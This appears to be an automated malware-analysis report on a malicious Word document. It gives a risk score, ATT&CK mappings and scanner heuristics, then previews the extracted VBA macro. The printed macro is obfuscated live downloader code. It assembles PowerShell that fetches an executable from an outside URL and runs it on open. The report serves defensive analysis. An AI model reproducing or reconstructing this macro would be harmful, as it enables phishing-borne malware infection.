MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call and obfuscated string concatenation to construct and execute a URL, which likely serves as a downloader for a second-stage payload. The presence of the AutoOpen macro and the Shell() call strongly indicate malicious intent.
Heuristics 7
-
ClamAV: Doc.Macro.Obfuscation-6394109-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscation-6394109-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 50156 bytes |
SHA-256: b3b082f538c10dcb27a912351a9df8f9b8d78c5d8e87a559db73e237d08654c1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "SXJzpjlQVKiOD"
Function FFVjzIwvtMPzG()
sippEWSB = Array("MpHmWDNmpnD" + "rCilAIR" + "cjQROzJsQzKC" + "fHUkiYMcCj" + "GFUwNdFMl")
kJLjDZ = Mid("2dBXgJr+gJrTm;9zXT'+'+zXTTzXT+zXT7zXT'+'+zXTbczXT+zXTd = WfDhttpzXTgJr+gJr+zXT:gJr+gJr//www.rentagJr+gJrlhtmamz'+'XT+zXTamia.czXT+zXTomzXT+zXT/nzXT+zXTPmD/zXT+zXT'+',zXT+wLpPPFS8wiBPEIbYJ2rE0WzXirO", 4, 167)
kBIjJnu = Array("uTIGzVtdW" + "hcRFSbZ" + "HofFfFBH" + "KrVvQqpWCJ" + "MwwOFVCh")
zRWcov = Array("zdZpYXtVVpcAkM" + "OARkEKZCBLIiNf" + "uwQajiuuKBTGh" + "mFVIBwcnchkZa" + "iPsjqhuijK")
TNPFrjhsFRc = Array("ZwnrNGjc" + "aBobcnJYnMsSn" + "FdKAVpEYj" + "TUzspDDozctI" + "LfNKzZlwtlfh")
EHarHcV = Mid("6HreazXT+zXTkzXT+zXT;}catch{write'+'-hzXT+zXTo'+'st 9T7_.EzXT+zXTxceptiozXT+zXTnzXT+zXT.MeszXT+zXTsagzXT+zXTe;zXT+zXT}'+'}zXT)-CrEPLACEg08ttwO6WNvIWilkUYShhc9Efi0adfnl", 3, 134)
CzScZncnrcN = Array("QUFHilDrKOF" + "WMjLHWjqGDWQu" + "mQzzIVKd" + "iWftwjhQJYcV" + "KWmHAUYMzp")
YkkOGOM = Array("CFOnpCUHI" + "pRjjIDTK" + "zwzVIfEwvk" + "iRKbAzaMnq" + "ZCXYtQpdsaaGk")
XNQbSWk = Array("DYbwGmWVwv" + "ijRMjwmz" + "CUvuTcAj" + "fCzdfEnwMqbwiG" + "GYlfoGKUVFRic")
zHObbVUvKQp = Mid("kaq9AVkS2KoT+zXgJr+gJrT6jnM4", 12, 12)
CwhtVmOlS = Array("DkGHkEZWi" + "XGHjKdGXiJ" + "wwjlnISszH" + "aIzNUECm" + "DUzAmIGSP")
IwiNavc = Array("dilmWRsHBDNZ" + "mvVLTOEnuqUu" + "UiiXOVKRjMpLM" + "wwXhSPYXYzuzU" + "tinRsdwKdd")
jzNcl = Array("ZqarBLI" + "XiSTdRcdMbUL" + "ZHVTptIGarlW" + "SjaQUiKNTLwli" + "njvYhnSA")
rbIod = Mid("icaYoDjU2264cotinsPJqXPK62iYcb2JwDJr+gJrT7envzXT+zXT:publiczXT+zXT +zXT+'+'zXT WfzXT+zXTDczXT+zgJr+gJrXTwYWfD + 9zXT+zXTTzXT+zXT7karapazXjH", 35, 103)
DwKfVro = Array("sOQCjjAGaGoWJ" + "fUzJicQ" + "nYBYXTj" + "nVtraBIVpTuqu" + "ELiPMIzBw")
oZpjjNtJp = Array("FYLRzawqjzjz" + "DwHqBUGvWiGhV" + "fTEjaSzVsI" + "KmWVRowN" + "fzRrmztoipEkiD")
ZJMVQPfAiwO = Array("CMlTORfJj" + "BuAJzfbPUSnbtl" + "zBOOvJHGMiVS" + "aJJWRCsXNmP" + "nNaicbTAjPP")
TQIHp = Mid("Ujfnmvln9z67vTent;9T7zXT+zXTgJ'+'r+gJrnsadasdzXT+zXT = zXT+zXTnew-ozXT+zXTbjzXT+zXTeczXT+gJr+gJrzXTt rgJr+gJrandozXT+zgJr+gJraYlvWFtvCl", 14, 112)
ZjGioKDzikV = Array("WcNJhtiEw" + "qikZFuITbrj" + "NwdYKmC" + "cjiEwpa" + "jAzuSNvPJOduw")
hlPWZzKfj = Array("unluoofiM" + "oLIQJrtMmOzjIv" + "ckCCSuLtsciQ" + "jYGkRqYPWLRbGX" + "BSKipNMEcbu")
ndljQBvaYB = Array("vGfrBiiva" + "XfAKFtiFvcbUz" + "wZzcSzV" + "mIoRpmHoKz" + "PwGABpWOwz")
oOXKYKzIfYn = Mid("UIK6zmADaDFSoKpIIQa7DUkfoZNzXT9T7gJr+gJrzXT+zXTbcd)zXT+gJr+gJrzXT{tzX'+'T+zXTry{9T7frgJr+gJrzX'+'T+zXTanc.DownloadFzXT+zgJr+gJrXTilezXT+zXT(9zXT+zgJr+'+'gJr'+'XTT7abzXT+zXTcz'+'XT+zXT.ToSzXT+zXTtzXT+zXTring(),zXT+zXT 9TRvvwmw2F", 28, 192)
LoaTPK = Array("dSQofav" + "NIOSRXRFYla" + "XisZRzak" + "UiJXpvzGWm" + "LuPsEsN")
jJlUjEzXRrq = Array("qaGdtbiBcaUw" + "rVoErzGRbzkDr" + "wnwkWbBROL" + "tjFIXwvz" + "JjBRXBqSP")
RPDUbwuQwv = Array("cBdcmJYWn" + "GofPNvq" + "JjtOFokvYrJ" + "QVoDSpcV" + "MKCkTSvKuzfru")
nISwRd = Mid("UQzwHGYlAnRizskEqMkrvr2FnNHiz'+'XT+zXT7o2P5", 29, 11)
lCfZqTvaS = Array("WZBDkOjqzXr" + "HcswRAJEBoD" + "PSmiNVliCkp" + "scVurFwcViYY" + "YkpJKbhVWn")
GofwciFqiiT = Array("GZNwprrkj" + "fpkzcwXTU" + "wWqdlVokiudQ" + "IidEtniwbd" + "EiiwizZMWJQki")
bkcHZO = Array("ZuNNuzA" + "jvhNRbYlMpvFOI" + "mRnvbmTEULh" + "BSTcwrkbJzw" + "wrhJRoOoQQav")
jwlDbTm = Mid("zjJKs + WfD.zXT+zXTexeWzXT+zXTfD;forez'+'XT+zXTach(9T7aEi1AzvLtUIjsK", 5, 51)
ktiGwAEiXk = Array("LTCGGlkPTcRw" + "djpmUsBYGnsCj" + "RtMrzvTiTb" + "VsEpLFfkEwfhW" + "rjLEjKEZQSWHkT")
OhFci = Array("DYKQqMCj" + "XTsNzNijUnUAzk" + "JmfwtOl" + "XVtTZLSmuDCUO" + "DpAKkvmaG")
XhfrIpnvh = Array("YPOUqIGC" + "WYcRPlQnvllYjE" + "XFqiOwSwHdGDpt" + "jFTmPXiTq" + "zFqPXlrLSz")
rRihwrlLck = Mid("ul8tHMjr6Ys6tH84LhzXT+zXTuazXT+zXTs);IzXT+zXTnzXgJr+gJrT+zXTvogJr+gJrke-ItezXTgJr+gJr+zXTmzXT+zXT(9T7h'+'zXT+Xv5aIQczjji9DIrJM
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.